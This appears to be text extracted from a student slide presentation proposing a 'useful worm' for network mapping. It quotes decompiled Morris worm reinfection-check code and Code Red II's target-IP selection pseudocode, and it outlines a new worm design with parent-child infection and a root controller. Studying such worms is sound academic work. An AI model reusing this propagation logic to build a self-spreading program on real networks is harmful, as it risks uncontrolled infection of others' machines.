The Worm Works For You

Matt Weaver

CS591

Introduction

The Shockwave RiderPARC

Town Crier Vampire

Goal

Use a worm to measure bandwidth and map a network.

Analyze classic worms. Morris Code Red

Determine the algorithm and architecture of a “useful worm”

Morris Mistake

Listen on a port: failure leads to infection.Machines were reinfected.

Morris checkother() /* 0x57d0 */ { int s, l8, l12, l16, optval; struct sockaddr_in sin; /* 16 bytes */ optval = 1; if ((random() % 7) == 3) return; /* 612 */ s = socket(AF_INET, SOCK_STREAM, 0); if (s < 0) return; /* Make a socket to the localhost, using a link-time specific port */ bzero(&sin, sizeof(sin)); /* 16 */ sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1")); /* <other_fd+4> */ sin.sin_port = 0x00005b3d; /* ??? */ if (connect(s, &sin, sizeof(sin)) < 0) { close(s); } else { l8 = MAGIC_2; /* Magic number??? */ if (write(s, &l8, sizeof(l8)) != sizeof(l8)) { close(s); return; } l8 = 0; if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) { close(s); return; } if (l8 != MAGIC_1) { close(s); return; }

l12 = random()/8; if (write(s, &l12, sizeof(l12)) != sizeof(l12)) { close(s); return; }

if (xread(s, &l16, sizeof(l16), 10) != sizeof(l16)) { close(s); return; }

if (!((l12+l16) % 2)) pleasequit++; close(s); } sleep(5); s = socket(AF_INET, SOCK_STREAM, 0); if (s < 0) return; /* Set the socket so that the address may be reused */ setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval)); if (bind(s, &sin, sizeof(sin)) < 0) { close(s); return; } listen(s, 10); other_fd = s; return; }

Code Red II

Mountain DewCode Red utilized a clever distribution

scheme: not just the random IP trick.

Code Red II (Continued)

mtable[] = { 0xFFFFFFFF // go anywhere 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFF0000 // stay in class B 0xFFFF0000 // stay in class B 0xFFFF0000 }; // stay in class B # start with a random number that will be our new IP address. # I presume the random number generator is "random enough". newip = random(); # zero the UPPER octets of the random IP, which means that the # random number won't participate in the class A or class B # address mask = mtable[ random() & 0x7 ]; // locate a mask newip &= mask; // throw away rightmost bits # flip the mask around to operate on LOWER octets mask = ~mask; // flip the mask around myip = LOCAL_IP & mask; // throw away leftmost bits # newip contains the upper bits # myip contains the lower bits # join them: newip |= myip; if (newip starts with 127) try again // localhost if (newip starts with 224) try again // multicast if (newip matches LOCAL_IP) try again Connect to "newip" and try to infect

A New Worm

Root

Target

Target

Target

Target

Network

Logic

Write a text file (C on Win ~ on Unix)

Talk to parent. Find next machine. Infect next. Talk to parent. Timed death. Forced death (success).

Parent Child Next Target

Concerns

Running amok/re-infection.Termination

The Root Machine

Compiles UDP payload information from child instances.

Maps network.Dynamically generate viral payload

(binary).Provide control values.

Conclusion

Master’s Project: get it working safely.

Sources

Aleph One. “Smashing the Stack for Fun and Profit”. Phrack 49.

CERT. http://www.cert.org/ Eren, Sinan. “Smashing the Kernel Stack for Fun and

Profit.” Phrack 60. Erickson, Jon. Hacking: The Art of Exploitation. No

Startch Press, 2003. Morris, Robert. Morris Worm Source Code.

http://www.foo.be/docs-free/morris-worm/worm/ Wikipedia, “Computer Worm”.

http://en.wikipedia.org/wiki/Computer_worm Wiedl, Steve. Unix Wiz. http://www.unixwiz.net/